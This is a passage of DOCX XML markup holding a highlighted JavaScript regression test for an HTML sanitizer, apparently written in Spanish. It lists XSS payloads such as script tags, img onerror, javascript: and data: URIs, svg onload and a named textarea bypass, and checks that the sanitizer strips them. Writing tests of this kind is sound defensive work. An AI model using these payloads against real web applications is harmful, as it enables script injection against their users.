        <w:t xml:space="preserve"> XSS_PAYLOADS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> [</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'script tag básico'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    input</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'&lt;script&gt;alert("xss")&lt;/script&gt;&lt;p&gt;legitimo&lt;/p&gt;'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    allowedTags</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'p'</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'img onerror'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    input</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'&lt;img src=x onerror="alert(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">\'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">xss</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">\'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)"&gt;'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    allowedTags</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'img'</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'javascript: protocol'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    input</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'&lt;a href="javascript:alert(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">\'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">xss</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">\'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)"&gt;click&lt;/a&gt;'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    allowedTags</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'a'</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'SVG onload'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    input</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'&lt;svg onload="alert(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">\'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">xss</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">\'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)"&gt;'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    allowedTags</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'svg'</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'CVE-2025-15599 textarea bypass'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    input</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'&lt;textarea&gt;&lt;img src=x onerror=alert(1)&gt;'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    allowedTags</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'textarea'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'img'</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'nested event handlers'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    input</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'&lt;div onclick="alert(1)" onmouseover="alert(2)"&gt;text&lt;/div&gt;'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    allowedTags</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'div'</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'data: URI execution'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    input</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'&lt;a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4="&gt;click&lt;/a&gt;'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    allowedTags</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'a'</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'style expression (legacy IE)'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    input</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'&lt;div style="background-image: url(javascript:alert(1))"&gt;text&lt;/div&gt;'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    allowedTags</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'div'</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'HTML entities en event handlers'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    input</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'&lt;img src=x onerror="&amp;#97;&amp;#108;&amp;#101;&amp;#114;&amp;#116;(1)"&gt;'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    allowedTags</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'img'</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'template injection'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    input</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'&lt;template&gt;&lt;script&gt;alert(1)&lt;/script&gt;&lt;/template&gt;'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    allowedTags</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'template'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FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">describe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'Sanitización HTML - Regresión XSS'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XSS_PAYLOADS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">forEach</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(({ name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> input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VerbatimStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">`elimina vectores XSS: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">${</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimStringTok"/>
        </w:rPr>
        <w:t xml:space="preserv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sanitizeHtml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(input</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        allowedTags</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r>
        <w:br/>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'br'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'strong'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'em'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'u'</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'img'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'table'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'tr'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'td'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'th'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'thead'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'tbody'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'ul'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'ol'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'li'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'h1'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'h2'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'h3'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'h4'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
